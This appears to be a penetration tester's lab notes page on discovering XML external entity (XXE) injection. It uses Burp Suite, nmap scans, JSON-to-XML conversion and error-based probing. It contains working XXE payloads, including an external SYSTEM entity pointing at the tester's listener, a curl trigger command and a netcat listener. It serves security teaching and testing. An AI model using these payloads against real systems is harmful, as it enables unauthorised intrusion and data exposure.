DISCOVERY

METHOD 1: XML EXPECTED INPUT

#find web pages that accept an XML user input
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: 127.0.0.1
 ...
 * submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /submitDetails.php HTTP/1.1
   <?xml version="1.0" encoding="UTF-8"?>
    <root>
     <name>First</name>
     <tel></tel>
     <email>[email protected]</email>
     <message>This is a test email</message>
    </root>

 * forms that appears to be sending user input data in an XML format can be tested for potential XXE vulnerability
    - the target page may be vulnerable to XXE injection if the user input isn't properly sanitized or safely parsed

#identify which elements are being displayed IOT know which elements to injext malicious xml input
#if no elements are displayed, utilize blind xxe injection method
BURP > Repeater
 Request
  ...
   <?xml version="1.0" encoding="UTF-8"?>
    <root>
     <name>First</name>
     <tel></tel>
     <email>[email protected]</email>
     <message>This is a test email</message>
    </root>
 Response
  ...
  HTTP/1.1 200 OK
   check your email [email protected] for verification...
  
 * the email field is reflected in the response and may be vulnerable to xxe injection

#perform test
BURP > Repeater
 Request
  ...
  POST /submitDetails.php HTTP/1.1
   <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE email [
    <!ENTITY company "XXE Injection Test">
    ]>
    <root>
     <name>First</name>
     <tel></tel>
     <email>&company;</email>
     <message>This is a test email</message>
    </root>
    
 * if there is an xxe vulnerability, the XML entity named 'company' which is referenced by &company;
   should be replaced with the value defined (XXE Injection Test)
    
 Response
  ...
  HTTP/1.1 200 OK
   check your email testCompany for verification...
   
 * if the HTTP response displayed the xxe reference element "&company;"
   instead of the raw value "XXE Injection Test" then the webapp isn't vulnerable
   to XXE Injection. 
   
 * if the XML input in the HTTP request had no DTD being declared within the XML data itself, or being referenced externally,
   DTD should be added before defining an entity; if the DOCTYPE is already declared in the XML request,
   only the ENTITY element is required

METHOD 2:

root@oco:~$ sudo nmap -sC -sV -T4 10.129.196.91 -p-
 PORT     STATE SERVICE VERSION
 3000/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3001/tcp open  http    PHP cli server 5.5 or later
 |_http-title: Login
 3002/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3003/tcp open  http    PHP cli server 5.5 or later (PHP 7.4.3)

root@oco:~$ sudo nmap --script=vuln -T4 10.129.196.91 -p 3000-3003
 PORT     STATE SERVICE
 3000/tcp open  ppp
 3001/tcp open  nessus
 3002/tcp open  exlm-agent
 3003/tcp open  cgms
 
root@oco:~$ BROWSER > http://10.129.196.91:3001/

 * this is a login form
 
#find web pages that accept an XML user input
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 email: [email protected]
 password: password123
 
 * submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /api/login/ HTTP/1.1
  Host: 10.129.196.91:3001
  Content-Length: 111
  Accept-Language: en-US,en;q=0.9
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
  Content-Type: text/plain;charset=UTF-8
  Accept: */*
  Origin: http://10.129.196.91:3001
  Referer: http://10.129.196.91:3001/
  Accept-Encoding: gzip, deflate, br
  Connection: keep-alive

  <?xml version="1.0" encoding="UTF-8"?>
   <root>
    <email>[email protected]</email>
    <password>password123</password>
   </root>

 * forms that appears to be sending user input data in an XML format can be tested for potential XXE vulnerability
    - the target page may be vulnerable to XXE injection if the user input isn't properly sanitized or safely parsed
 
 * notice that an API is handling the user authentication functionality of the 
   application and the user authentication is generating XML data.

#craft exploit
root@oco:~$ nano payload.xml
 <?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE pwn [<!ENTITY somename SYSTEM "http://<VPN/TUN Adapter IP>:<LISTENER PORT>"> ]>
   <root>
    <email>[email protected]</email>
    <password>P@ssw0rd123</password>
   </root>

* A Document Type Definition (DTD) defines the structure, elements, and attributes of 
  an XML document. Declared within the DOCTYPE element, it can be internal or an 
  external resource.

#setup
root@oco:~$ nc -nlvp 4444
 ...
 
#trigger
root@oco:~$ Str1f3@htb[/htb]$ curl -X POST http://<TARGET IP>:3001/api/login -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE pwn [<!ENTITY somename SYSTEM "http://<VPN/TUN Adapter IP>:<LISTENER PORT>"> ]><root><email>&somename;</email><password>P@ssw0rd123</password></root>'
 ...

root@oco:~$ nc -nlvp 4444
 listening on [any] 4444 ...
 connect to [<VPN/TUN Adapter IP>] from (UNKNOWN) [<TARGET IP>] 54984
 GET / HTTP/1.0
 Host: <VPN/TUN Adapter IP>:4444
 Connection: close

METHOD 3: JSON TO XML CONVERSION

JSON To XML Converterwww.convertjson.com

#find web pages that accept an XML user input
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: 127.0.0.1
 ...
 * submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /submitDetails.php HTTP/1.1
  Accept: application/json
  Content-Type: application/json
  ...
  {"search":"name","value":"api..."}

 * forms that appears to be sending user input data in an JSON format can be tested for potential XXE vulnerability as well
    - the target page may be vulnerable to XXE injection if the user input isn't properly sanitized or safely parsed

 * Some web applications may default to a JSON format in HTTP request, but may still accept other formats, including XML
   even if a webapp sends requests in JSON format, try changing the "Content-Type" header to
   "application/xml", and then convert the JSON data to XML via the JSON to XML Converter tool

#identify which elements are being displayed IOT know which elements to injext malicious xml input
#if no elements are displayed, utilize blind xxe injection method
BURP > Proxy > Intercept > Raw
 Request
  ...
   {"search":"name","value":"api..."}
 Response
  ...
  HTTP/1.1 200 OK
   name: api ...

#convert json data to xml
root@oco:~$ BROWSER > https://www.convertjson.com/json-to-xml.htm
 Option 3 - Paste into Text Box: {"search":"name","value":"api..."}
 Output:
  <?xml version="1.0" encoding="UTF-8" ?>
    <root>
      <search>name</search>
      <value>api...</value>
    </root>


#perform test
BURP > Repeater
 Request
  ...
  POST /submitDetails.php HTTP/1.1
  Accept: application/json                //test this one if this need to be changed
  Content-Type: application/xml           //changed the Content-Type: application/json to application/xml
    
  <?xml version="1.0" encoding="UTF-8" ?>
    <!DOCTYPE email [
    <!ENTITY name "XXE Injection Test">
    ]>
    <root>
      <search>&name;</search>
      <value>api...</value>
    </root>
    
    
 Response
  ...
  HTTP/1.1 200 OK
   XXE Injection Test ...
   check your email testCompany for verification...
   
 * if the HTTP response displayed the xxe reference element "&name;"
   instead of the raw value "XXE Injection Test" then the webapp isn't vulnerable
   to XXE Injection. 
   
 * if the XML input in the HTTP request had no DTD being declared within the XML data itself, or being referenced externally,
   DTD should be added before defining an entity; if the DOCTYPE is already declared in the XML request,
   only the ENTITY element is required

ERROR-BASED

this discovery method is used when the web application doesn't write any output from the attacker's XML input entities. thus the attacker is blind to the XML output and wouldn't be able to retrieve any file content using usual methods. in this case, attackers can test whether the webapp displays runtime errors such as PHP errors. this vulnerability can be utilized if the webapp does not have proper exception handling for the XML input. this flaw can be used to read the output of the XXE exploit

#perform test
BURP > Repeater
 Request
  ...
  POST /submitDetails.php HTTP/1.1
  Accept: application/json                //test this one if this need to be changed
  Content-Type: application/xml           //changed the Content-Type: application/json to application/xml
    
  <?xml version="1.0" encoding="UTF-8" ?>
    <root>
     <name>First</name>
     <tel></tel>
     <email>&nonExistingEntity;</email>
     <message>This is a test email</message>
    </root>
    
    
 Response
  ...
  HTTP/1.1 200 OK
   <b>Warning</b>
   : DOMDocument::loadXML(): Entity 'nonExistingEntity' not defined in Entity, line: 5 in...

 * if the web application displays an error, it may reveal the web server directory, which can be used to read the source code of other files

 * ALT: delete any of the closing tag so, it does not close (e.g. <roo> instead of <root>

PreviousXML EXTERNAL EXTITY (XXE)NextWINDOWS

Last updated 8 months ago